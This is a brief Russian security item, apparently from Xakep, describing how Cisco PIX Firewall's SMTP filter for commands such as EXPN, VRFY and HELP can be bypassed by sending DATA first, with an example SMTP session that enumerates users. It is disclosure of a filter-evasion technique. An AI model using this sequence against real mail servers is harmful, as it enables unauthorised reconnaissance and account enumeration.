Рекомендуем почитать:
Xakep #305. Многошаговые SQL-инъекции
Cisco PIX Firewall использует определенный алгоритм для предотвращения использования нежелательных команд (таких как HELP, VRFY, EXPN, etc). Однако, его можно обойти 🙂 используя DATA-команды. После обхода можно использовать любые "нежелательные" команды.
Пример:
helo ciao
mail from: someone@example.com
data
expn guest
vrfy oracle
help
[etc, etc]
quit